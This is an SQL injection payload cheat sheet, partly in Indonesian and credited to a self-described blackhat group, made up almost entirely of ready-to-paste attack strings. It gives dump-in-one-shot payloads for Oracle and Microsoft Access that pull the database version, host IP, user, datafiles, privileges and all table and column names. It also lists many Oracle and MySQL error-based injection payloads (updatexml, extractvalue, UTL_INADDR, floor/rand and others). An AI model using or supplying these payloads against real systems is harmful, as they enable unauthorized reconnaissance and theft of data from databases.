MYSQL | SYBASE | POSTGRESQL | IMB DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SERVER [MSSQL] | PHPMYWIND [MYSQL]
Re-Upload : 14 Juli 2022
========================
@Arjuna Dewangga
@Javanese BlackHat ID 14
========================
Credit : all Dewangga
Credit : PostgreSQL : Chaplin
SQLI UNION BASED :
– ORACLE SQL INJECTION
– POSTGRE SQL INJECTION
– SQLITE INJECTION
– SYBASE INJECTION
– MICROSOFT SQL SERVER INJECTION ( MSSQL Injection )
– MICROSOFT SQL ACCESS INJECTION
– IMB DB2 INJECTION
=================================
# DIOS MICROSOFT SQL ACCESS
and 1=0 UNION SELECT 1,2,3,4 from MSysAccessObjects
atau gunakan table/columns biasanya ( Microsoft access )
# DIOS ( ORACLE )
concat(‘DEW’,’%3cimg src=”link img” height=”290″ width=”290″%3e’||’%3cbr%3e’||’%3cli%3e’||’PRINT SYSTEM’||’%3cli%3e’||’VERSION :: ‘||(SELECT BANNER from V$version where rownum=1)||’%3cli%3e’||’DATABASE :: ‘||SYS.DATABASE_name||’%3cli%3e’||’ HostName IP Address :: ‘||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_address||’%3cbr%3e’||’ %3e%3e%3e ‘||(SELECT host_name FROM v$instance where rownum=1)||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_name||’%3cli%3e’||’USER :: ‘||user||’%3cli%3e’||’DB FILLES :: ‘||(SELECT name FROM V$DATAFILE where rownum=1)||’%3cli%3e’||’PRIVILEGES :: ‘||(SELECT grantee FROM dba_sys_privs where rownum=1)||’%3cli%3e’||’SERVER OPERATING SYSTEM :: ‘||(select member from v$logfile where rownum=1)||’%3cli%3e’||’THE SERVER SID :: ‘||(select instance_name from v$instance)||’%3cbr%3e’||’%3cbr%3e’||’%3cli%3e’||’DUMP DB’||’%3cbr%3e’||(select wm_concat(‘%3cli%3e’||table_name||’ %3e%3e%3e ‘||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c167))||’%3c!–‘
From Dual
ENCODE/DECODE = CHR
Jika tidak bisa WN_CONCAT ganti dengan LISTAGG
or 1=utl_inaddr.get_host_name(CHR(60)||CHR(98)||CHR(114)||CHR(62)||user||CHR(60)||CHR(98)||CHR(114)||CHR(62)||sys.database_name||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select banner from v%24version where rownum=1)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select wm_concat(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c25))
(select LISTAGG(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name) within group (ORDER BY table_name) from all_tab_columns where rownum%3c25)
ERROR BASED
And 1=UTL_INADDR.GET_HOST_NAME((select banner from v$version where rownum=1))%3b
And 1=UTL_INAADR.GET_HOST_ADDRESS((select banner from v$version where rownum=1))%3b
And 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),user,user)%3b
and 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))%3b
and 1= and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null —
And 1=and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null —
And 1=and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null —
And 1=and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null —
And 1=and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null —
And 1= and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–
# DIOS ERROR BASED MYSQL
1.updatexml()
select %2a from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%3b
2.extractvalue()
select %2a from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))%3b
3.exp()
select %2a from users where id=1 and exp(%7e(select %2a from(select user())a))%3b
4.geometrycollection()
select %2a from users where id=1 and geometrycollection((select %2a from(select %2a from(select user())a)b))%3b
5.multipoint()
select %2a from users where id=1 and multipoint((select %2a from(select %2a from(select user())a)b))%3b
6.polygon()
select %2a from users where id=1 and polygon((select %2a from(select %2a from(select user())a)b))%3b
7.multipolygon()
select %2a from users where id=1 and multipolygon((select %2a from(select %2a from(select user())a)b))%3b
8.linestring()
select %2a from users where id=1 and linestring((select %2a from(select %2a from(select user())a)b))%3b
9.multilinestring()
select %2a from users where id=1 and multilinestring((select %2a from(select %2a from(select user())a)b))%3b
10.floor
select %2a from users where id=1 and (select 1 from (select count(%2a),concat(user(),floor(rand(0)%2a2))x from information_schema.tables group by x)a)%3b
11.PROCEDURE ANALYSE
+PROCEDURE ANALYSE+(EXTRACTVALUE(0,CONCAT(0x27,0x3a,@@VERSION)),1)
# Ket : Decode URL
===============
#SQLI #Sqlinjection #sqlihardbypass #sqlichallenge #sqlchall
THANKS